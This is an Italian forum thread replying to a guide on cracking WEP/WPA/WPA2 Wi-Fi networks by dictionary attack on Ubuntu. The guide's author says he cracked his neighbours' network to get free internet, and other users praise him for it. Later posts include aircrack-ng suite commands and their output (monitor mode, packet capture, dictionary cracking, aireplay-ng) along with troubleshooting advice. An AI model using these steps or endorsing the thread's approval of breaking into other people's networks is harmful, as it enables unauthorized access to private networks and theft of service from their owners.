• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Guida Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

Bella guida complimenti system32..Anche se fortunatamente ci sono qui in giro 3 reti non protette al quale posso connetermi!:=)

Io ho dovuto craccare la rete dei miei vicini per potermi connettere tutti i giorni e a tutte le ore, perchè la mia tariffa ( Night & Weekend ) non mi fa connettere ogni giorno, ragione per la quale ho deciso di fare la guida.
 
Asd é brutta quella tariffa la avevo annch'io prima della"FLAT" Bhè l'importante è che sei riuscito a craccare quella dei tuoi vicini:emoji_slight_smile:
 
Io ho dovuto craccare la rete dei miei vicini per potermi connettere tutti i giorni e a tutte le ore, perchè la mia tariffa ( Night & Weekend ) non mi fa connettere ogni giorno, ragione per la quale ho deciso di fare la guida.

E' in questi momenti che provo piena stima nei tuoi confronti. :emoji_relieved:

Ottima guida, ben spiegata.. che dire, complimenti Alè!​
 
salve a tutti del forum complimenti x la bella guida vi espongo il mio problema ho ubuntu 10.10 ho installato il prog per testare la mia rete
wpa, ho digitato i seguenti comandi da terminale.

1)airmon-ng start wlan0
2)sudo airodump-ng mon0

3)sudo airodump-ng -c 11 -w wpa mon0
mi appare

xx:xx:xx:xx:xx:xx -62 0 24334 34054 7 6 54 . OPN nome
xx:xx:xx:xx:xx:xx -94 17 1318 4 0 6 54e WPA2 CCMP PSK TimoNet
xx:xx:xx:xx:xx:xx -94 0 662 115 0 6 54 WPA2 CCMP PSK nome
xx:xx:xx:xx:xx:xx -63 0 56 0 0 11 54e WPA TKIP PSK nome
xx:xx:xx:xx:xx:xx -79 0 30 0 0 11 54e. WPA2 CCMP PSK nome
xx:xx:xx:xx:xx:xx -84 0 11 0 0 1 54 WPA TKIP PSK nome
xx:xx:xx:xx:xx:xx -91 0 8 0 0 3 54 WPA2 TKIP PSK nome

poi do il comando
sudo aircrack-ng -w dizionario wpa-01.cap

risultato

honny@jhonn-1000HG:~$ sudo aircrack-ng -w dizionario wpa-01.cap
[sudo] password for jhonny-system:
fopen(dictionary) failed: No such file or directory
fopen(dictionary) failed: No such file or directory
Opening wpa-01.cap
Read 574 packets.

# BSSID ESSID Encryption

1 xx:xx:xx:xx:xx:xx nome No data - WEP or WPA
2 xx:xx:xx:xx:xx:xx nome None (ip.ip.ip.ipp)

Index number of target network ?
scelgo la 1 che è quella che mi interessa e mi appare

Opening wpa-01.cap
Got no data packets from target network!


Quitting aircrack-ng...
jhonny@jhonn-Opening wpa-01.cap
Got no data packets from target network!

Opening wpa-01.cap
Got no data packets from target network!


Quitting aircrack-ng...
jhonny@Jhonny-1000HG:~$

dove sbaglio potete aiutarmi x favore grazie a tutti
 
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

salve a tutti del forum complimenti x la bella guida vi espongo il mio problema ho ubuntu 10.10 ho installato il prog per testare la mia rete
wpa, ho digitato i seguenti comandi da terminale.

1)airmon-ng start wlan0
2)sudo airodump-ng mon0

3)sudo airodump-ng -c 11 -w wpa mon0
mi appare

xx:xx:xx:xx:xx:xx -62 0 24334 34054 7 6 54 . OPN nome
xx:xx:xx:xx:xx:xx -94 17 1318 4 0 6 54e WPA2 CCMP PSK TimoNet
xx:xx:xx:xx:xx:xx -94 0 662 115 0 6 54 WPA2 CCMP PSK nome
xx:xx:xx:xx:xx:xx -63 0 56 0 0 11 54e WPA TKIP PSK nome
xx:xx:xx:xx:xx:xx -79 0 30 0 0 11 54e. WPA2 CCMP PSK nome
xx:xx:xx:xx:xx:xx -84 0 11 0 0 1 54 WPA TKIP PSK nome
xx:xx:xx:xx:xx:xx -91 0 8 0 0 3 54 WPA2 TKIP PSK nome

poi do il comando
sudo aircrack-ng -w dizionario wpa-01.cap

risultato

honny@jhonn-1000HG:~$ sudo aircrack-ng -w dizionario wpa-01.cap
[sudo] password for jhonny-system:
fopen(dictionary) failed: No such file or directory
fopen(dictionary) failed: No such file or directory
Opening wpa-01.cap
Read 574 packets.

# BSSID ESSID Encryption

1 xx:xx:xx:xx:xx:xx nome No data - WEP or WPA
2 xx:xx:xx:xx:xx:xx nome None (ip.ip.ip.ipp)

Index number of target network ?
scelgo la 1 che è quella che mi interessa e mi appare

Opening wpa-01.cap
Got no data packets from target network!


Quitting aircrack-ng...
jhonny@jhonn-Opening wpa-01.cap
Got no data packets from target network!

Opening wpa-01.cap
Got no data packets from target network!


Quitting aircrack-ng...
jhonny@Jhonny-1000HG:~$

dove sbaglio potete aiutarmi x favore grazie a tutti

Ti ci vuole un dizionario per le reti WPA, cercando su google dovresti trovarlo.
 
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

Mi dice che il programma richiede i privilegi da root come faccio a mettermi root??
 
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

Grazie lo stesso Trynight ma avevo già risolto ;)
 
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

ciao nitro ti ho aggiunto su msn se puoi aiutarmi te ne sarò grato grazie io sono kikkobravo[MENTION=21474]hot[/MENTION]mail.it
 
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

ciao nitro ti ho aggiunto su msn se puoi aiutarmi te ne sarò grato grazie io sono kikkobravo[MENTION=21474]hot[/MENTION]mail.it

I problemi si risolvono qui sul Forum, poni le tue domande.
 
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

ok allora quando arrivo al punto di dover mettere aireplay-ng -numero numero che non so quali numeri inserire poi metto -a e il mac poi il mio mon e invio e mi da una specie di errore del tipo mon0 is on channel -1 e altre cose
 
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

ok allora quando arrivo al punto di dover mettere aireplay-ng -numero numero che non so quali numeri inserire poi metto -a e il mac poi il mio mon e invio e mi da una specie di errore del tipo mon0 is on channel -1 e altre cose

C'è qualche altra rete che sfrutta lo stesso canale della rete che vuoi crackare ?
 
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

la rete è la mia quando faccio l'operazione sono connesso e poi si stavamo usando in 2 la rete io e mia madre con il portatile,,,
scusa poi unaltra cosa mi identifica solo lo station"mac" della mia rete e non quelli altrui
--------------- AGGIUNTA AL POST ---------------
si provo a craccare la mia rete con chiave wpa al momeneto eerano connessi 2 pc arrivo al punto di dover mettere aireplay-ng -numero numero che non so quale numeri inserire -a e lo (station) ---->''mac'' e il mio mon e mi dice mon0 is on channel -1 e unaltra cosa che non mi ricordo
 
Ultima modifica:
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

Non hai risposto alla mia domanda...Quando analizzi le reti wireless vicine ognuna di essere "lavora" su un determinato canale. Ti ripongo dunque la domanda : c'è qualche altra rete che usa un canale uguale al tuo ?
 
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

semplicemente funzionante >_>
 
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

Evita post inutili.
 
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

ho un problema... quandi scrivo questo comando airmon-ng start wlan0
mi appare Run it as root mi date una mano?
 
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

ho un problema... quandi scrivo questo comando airmon-ng start wlan0
mi appare Run it as root mi date una mano?

Devi essere root ( ovvero un amministratore ) per dare quel comando. Scrivi sudo airmon-ng start wlan0, digita la password ( anche se non la visualizzerai tu digitala lo stesso ) e premi INVIO.